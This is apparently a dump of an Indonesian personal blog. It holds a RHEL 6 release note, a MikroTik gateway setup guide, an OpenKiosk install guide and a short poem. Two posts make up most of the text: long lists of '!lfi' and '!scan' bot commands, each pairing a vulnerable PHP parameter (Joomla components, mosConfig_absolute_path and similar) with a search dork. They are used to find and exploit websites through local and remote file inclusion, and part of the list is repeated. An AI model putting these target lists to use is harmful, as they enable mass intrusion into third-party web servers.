Sabtu, 19 Maret 2011

Rilis Final Red Hat Enterprise Linux 6 - RHEL 6

Posted by zens 05:56, under | No comments



RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64,System z, dan IBM Power (64-bit).

Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.

"Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."

"Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".

"Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada press release.



Yang baru dengan Red Hat Enterprise Linux 6:

* Peningkatan grafis installer;
* Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);
* LVM enhancements;
* Power management yang lebih baik dengan powertop dan tuned;
* Peningkatan PackageKit dan Yum package managers;
* Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;
* Peningkatan keamanan;
* Pelabelan Network packet dan dukungan untuk IPv6;
* Fungsionalitas Suspend dan resume;
* Dukungan untuk multiple display;
* Driver video Nouveau untuk kartu grafis Nvidia;
* Dukunga Internasionalisasi;
* KDE SC 4.3;
* OpenOffice.org Office Suite 3.1;
* Mozilla Thunderbird 3;
* Mozilla Firefox 3.5;
* Apache 2.2.15;
* MySQL 5.1;
* PostgreSQL 8.4;
* Dokumentasi yang lebih baik;
* Peningkatan dukungan C++;
* Peningkatan Samba;
* Dukungan penuh untuk KVM (Kernel-based Virtual Machine);
* Dukungan Alternative PHP Cache (APC) untuk PHP;
* Penambahan memcached.

Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis.Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) danRed Hat Desktop.

Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.


Red Hat Enterprise Linux 5.5 (Registration Required)
[iso] [0 KB]


Red Hat Enterprise Linux 6 Beta 2 (ISO) i386

[iso] [3.40 GB]


Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64

[iso] [3.90 GB]

Jumat, 11 Maret 2011

Install Mikrotik Sebagai Gateway

Posted by zens 15:02, under , | No comments

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC


2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)

Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin
dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “killnine” (nama ini bebas terserah kalau mau diganti)
[admin@Mikrotik] > system identity set name=killnine
[admin@killnine] >

5. Melihat interface pada Mikrotik Router
[admin@killnine] > interface print
Flags: X – disabled, D – dynamic, R – running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@killnine] >

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254

[admin@killnine] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@killnine] > ip address add address=192.168.0.254
netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@killnine] >ip address print
Flags: X – disabled, I – invalid, D – dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2
[admin@killnine] >

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1
[admin@killnine] > /ip route add gateway=192.168.1.1


9. Melihat Tabel routing pada Mikrotik Routers
[admin@killnine] > ip route print
Flags: X – disabled, A – active, D – dynamic,
C – connect, S – static, r – rip, b – bgp, o – ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 192.168.0.0/24 192.168.0.254 ether2
1 ADC 192.168.0.0/24 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.1.1 ether1
[admin@killnine] >

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@killnine] > ping 192.168.1.1
192.168.1.1 64 byte ping: ttl=64 time<1>
192.168.1.1 64 byte ping: ttl=64 time<1>
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@killnine] >

11. Setup DNS pada Mikrotik Routers
[admin@killnine] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=no
[admin@killnine] > ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no

12. Melihat konfigurasi DNS
[admin@killnine] > ip dns print
primary-dns: 202.134.0.155
secondary-dns: 202.134.1.10
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@killnine] >

13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@killnine] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@killnine] >

Jika sudah berhasil reply berarti seting DNS sudah benar.

14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@killnine]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@killnine] >

15. Melihat konfigurasi Masquerading
[admin@killnine]>ip firewall nat print
Flags: X – disabled, I – invalid, D – dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@XAVIERO] >

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server.

Installing Linux Billing

Posted by zens 14:53, under , | No comments

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d. Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

LFI BUG AND DORK

Posted by zens 14:33, under | No comments

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"

Kamis, 01 April 2010

anak malam community

Posted by zens 10:31, under | 1 comment

kami hanya ingin jadi diri sendiri.........
aku adalah aku kamu adalah kamu...

tapi buat kami kamu adalah teman.....
entah kalian menganggap kami musuh atau apa saja......

Senin, 29 Maret 2010

new 29 maret 2010

Posted by zens 10:18, under | 1 comment

!scan /chat_actions.php3?chat_phpIRC_path= "phpChat"

!scan /includes/fotools.php?imgs_path= "/fotools.php"

!scan /includes/fotools.php?imgs_path= "wa-boo"

!scan /library/class.backup.php?adminroot= "Direct News"

!scan /admin/menu_xml.php?rootpath= "Direct News"

!scan /admin/articles/edit.php?mainpath= "/edit.php"

!scan /admin/articles/edit.php?mainpath= "Faethon"

!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "/lgsl" "/lgsl"

!scan /modules/dfss/lgsl/lgsl_players.php?lgsl_path= "DaFun Spirit"

!scan ?id= "Projekt i realizacja: Euroadres"

!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "component/option,com_moofaq"

!scan /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= component/option,com_content

!scan ?mosConfig.absolute.path= component/option,com_

!scan /index.php?option=com_remository&Itemid=&mosConfig.absolute.path= component/option,com_remository

!scan /index.php?option=com_wrapper&Itemid=&mosConfig.absolute.path= component/option,com_wrapper

!scan /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path= component/option,com_sefservicemap

!scan /index.php?option=com_sef&Itemid=&mosConfig.absolute.path= component/option,com_sef

!scan /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path= component/option,com_fabrik

!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/universal"

!scan /administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= "/com_universal"

!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "jwmmxtd"

!scan /administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= "/com_jwmmxtd"

!scan /languages/yourlanguage/definitions.php?include= "/yourlanguage"

!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "/yourlanguage"

!scan /languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= "Vanilla"

!scan /languages/yourlanguage/definitions.php?include= "Vanilla"

!scan /core/dispatcher.php?configRootDir= "/dispatcher"

!scan /template/babyweb/index.php?template= "WebMaid"

!scan /templates/template.php?content= "NotSopureEdit"

!scan /templates/template.php?content= "/template.php"

!scan /templates/template.php?content= "/templates" "/templates"

!scan /template/wm025/footer.php?modules= "/wm025" "/wm025"

!scan /template/babyweb/index.php?template= "/babyweb" "/babyweb"

!scan /errors.php?error= "/typo3conf" "/typo3conf"

!scan /errors.php?error= "/typo" "/typo"

!scan /errors.php?error= "/typo3" "/typo3"

!scan /sweetrice/_plugin/subscriber/inc/post.php?root_dir= "/sweetrice" "/sweetrice"

!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/softsaurus" "/softsaurus"

!scan /content/themes/softsaurus_default/pages/subHeader.php?objects_path= "/subHeader" "/subHeader"

!scan /content/plugins/wallpapers/wallpapers.php?includes_path= "/wallpapers" "/wallpapers"

!scan /include/mail.inc.php?root= "/mail.inc"

!scan /include/mail.inc.php?root= "Rezervi"

!scan /inc/bbcode.php?basePath= "deV!L`z Clanportal"

!scan /forum/adminLogin.php?config[forum_installed]= Login | Privacy | Terms of Use | Services | FAQ's | Articles | Affiliate | Invite a Friend | Feedback

!scan /forum/adminLogin.php?config[forum_installed]= "osDate" "osDate"

!scan /forum/adminLogin.php?config[forum_installed]= "/forum" "/forum"

!scan /forum/adminLogin.php?config[forum_installed]= "/adminLogin"

!scan /inc/config.php?basePath= "Clanportal"

!scan /inc/config.php?basePath= "/config.php"

!scan /system/database/DB_active_rec.php?BASEPATH= "/database" "/database"

!scan /ecrire.php?lang= "mcGuestbook"

!scan /ecrire.php?lang= "/ecrire.php"

!scan /external.php?url= "/external"

!scan /external.php?url= "/external.php?url="

!scan /includes/functions_common.php/modules/vwar/admin/admin.php?vwar_root= Powered by: Virtual War v1.5.0, Copyright © 2001 - 2004, vwar

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/filemanager"

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "ispCP Omega"

!scan /filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]= "/skins" "/skins"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/includes/tgpinc.php"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "Gnat-TGP" "Gnat-TGP"

!scan /includes/tgpinc.php?DOCUMENT_ROOT= "/tgpinc" "/tgpinc"

!scan /Wiky/include/WBmap.php?langFile= "/WBmap" "/WBmap"

!scan /Wiky/include/WBmap.php?langFile= "/Wiky" "/Wiky"

!scan /_center.php?page= "ProMan" "ProMan"

!scan /_center.php?page= "/index.php?page"

!scan /_center.php?page= "/_center.php"

!scan /errors.php?error= "/home.php?lng="

!scan /errors.php?error= "/home.php?language="

!scan /errors.php?error= "/home.php?id="

!scan /errors.php?error= "/home.php?to="

!scan /errors.php?error= "/home.php?go="

!scan /errors.php?error= "/home.php?lingua="

!scan /errors.php?error= "/home.php?pagina="

!scan /errors.php?error= "/home.php?page="

!scan /errors.php?error= "/home.php?pag="

!scan /errors.php?error= "/home.php?pg="

!scan /errors.php?error= "/home.php?p="

!scan /errors.php?error= "/home.php?act="

!scan /errors.php?error= "/home.php?pid="

!scan /errors.php?error= "/index.php?x="

!scan /errors.php?error= "/index.php?s="

!scan /errors.php?error= "/index.php?section="

!scan /errors.php?error= "/index.php?sel="

!scan /errors.php?error= "/index.php?go="

!scan /errors.php?error= "/index.php?include="

!scan /errors.php?error= "/index.php?admin="

!scan /errors.php?error= "/index.php?name="

!scan /errors.php?error= "/index.php?lng="

!scan /errors.php?error= "/index.php?language="

!scan /errors.php?error= "/index.php?id="

!scan /errors.php?error= "/index.php?to="

!scan /errors.php?error= "/index.php?go="

!scan /errors.php?error= "/index.php?pagina="

!scan /errors.php?error= "/index.php?page="

!scan /errors.php?error= "/index.php?pag="

!scan /errors.php?error= "/index.php?pg="

!scan /errors.php?error= "/index.php?p="

!scan /errors.php?error= "/index.php?act="

!scan /errors.php?error= "/index.php?pid="

!scan /home.php?page= "/home.php?page="

!scan /home.php?pag= "/home.php?pag="

!scan /home.php?pg= "/home.php?pg="

!scan /linkadmin.php?page= "/linkadmin.php"

!scan /nullpo/hsList.php?subdir= "/nullpo"

!scan /index.php?version= "/index.php?version="

!scan /board.php?code= "/board" "/board"

!scan /index.php?pid= "/index.php?pid="

!scan /index.php?opt= "/index.php?opt="

!scan /myevent.php?myevent_path= "/myevent.php"

!scan /Decoder.php?base_dir= "phpsyncml"

!scan /adm/krgourl.php?DOCUMENT_ROOT= "/adm" "/adm"

!scan /admin/modules/blocks.php?spaw_root= "/modules" "/modules"

!scan /rss_importer_functions.php?sitepath= "AdaptCMS" "AdaptCMS"

!scan /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]= "/com_ezine" "/com_ezine"

!scan /admin/popup.php?popup= admin/popup.php

!scan /microcms/includes/file_manager/special.php?fm_includes_special= "MAXcms" "MAXcms"

!scan /CoupleDB.php?Parametre=0&DataDirectory= "PHPGenealogy" "PHPGenealogy"

!scan /libraries/database.php?path= "efront" "efront"

!scan /components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]= "/com_ajaxchat" "/com_ajaxchat"

!scan /administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path= "/com_booklibrary" "/com_booklibrary"

!scan /debugger.php?config_atkroot= "Achievo" "Achievo"

!scan /bulletin//skin/pqbig_board_blue/login.php?dir= "/skin" "/skin"

!scan /components/com_mamboman/mamboman.html.php?mosConfig_absolute_path= "/com_mamboman" "/com_mamboman"

!scan /biblioteca/bib_form.php?CLASSPATH= "FreeSchool"

!scan /biblioteca/bib_form.php?CLASSPATH= "/biblioteca"

!scan /plugins/address/admin/index.php?GLOBALS[config][dir][plugins]= "PHPope"

!scan /engine/api/api.class.php?dle_config_api= "DatalifeEngine"

!scan /engine/api/api.class.php?dle_config_api= "/api" "/api"

!scan /tools/send_reminders.php?noSet=0&includedir= "WebCalendar v1.1.0c-CVS"

!scan SSI.php?sourcedir= "/forum/index.php?sourcedir="

!scan /admin/common.inc.php?base_path= "pollphp" "textfile"

!scan /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root= "/vwar"

!scan /index.php?page= "/index.php?page=faq"

!scan /index.php?sec= "/index.php?sec=faq"

!scan /components/com_moofaq/includes/file_includer.php?gzip=0&file= "/com_moofaq"

!scan /skin/ggambo7002_board/write.php?dir= "1999-2009 Zeroboard / skin by ggambo"

!scan ?APB_rp= "ApBoard"

!scan /includes/pear/Mail/RFC822.php?CONFIG[pear_dir]= "V-webmail"

!scan /forum/include/common.php?pun_root= "/forum"

!scan /dm-albums/template/album.php?SECURITY_FILE= "/dm-albums"

!scan /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript= "WordPress"

!scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= "/com_fabrik" "/com_fabrik"

!scan /com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_realestatemanager"

!scan /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path= "/com_vehiclemanager"

!scan /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "browse/category_id,2"

!scan /components/com_virtuemart/errors.php?error= "browse/category_id,2"

!scan /errors.php?error= "browse/category_id,2"

!scan /_theme/breadcrumb.php?rootBase= "! Hide Your Friends & Comments"

!scan /errors.php?error= "erstellt mit PHPKIT"



!scan es_custom_menu.php?files_dir= Weblogicnet



!scan components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= "/com_virtuemart" "/com_virtuemart"



!scan /?_PHPLIB[libdir]= /?_PHPLIB[libdir]=



!scan ?INC= "If You lost password enter Your login:"



!scan /ckshop.php?incdir= "Payment options"



!scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"



!scan ?_SERVER[DOCUMENT_ROOT]= "Powered by Bitrix Site Manager nulled by Nosferatu"



!scan ?dir[func]=&dir[base]= "ladder scripts"



!scan /errors.php?error= "/option,com"+"Joomla"



!scan /errors.php?error= "/option,com"+"Mambo"



!scan /errors.php?error= "/shop/index.php"



!scan /yacs/scripts/update_trailer.php?context[path_to_root]= "/yacs"



!scan errors.php?error= /ea-gBook /ea-gBook



!scan /ea-gBook/index_inc.php?inc_ordner= "/ea-gBook"



!scan appserv/main.php?appserv_root= "Index of /appserv"



!scan /includes/class_item.php?fileExtension= login.php?redirect=auction_details.php?auction_id=



!scan /include/footer.php?_path[counter]= RGBoard



!scan /latest/sirini_gallery_latest/list.php?path= GRBoard



!scan /include.php?grboard= GRBoard



!scan 179_squarebox_pds_list/view.php?theme= GRBoard



!scan /_conf/core/common-tpl-vars.php?confdir= PHPmyGallery



!scan ///////?cmd&file= "List Users with Pics only?"



!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= "/snippets" "/snippets"



!scan //ray/modules/global/inc/header.inc.php?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22



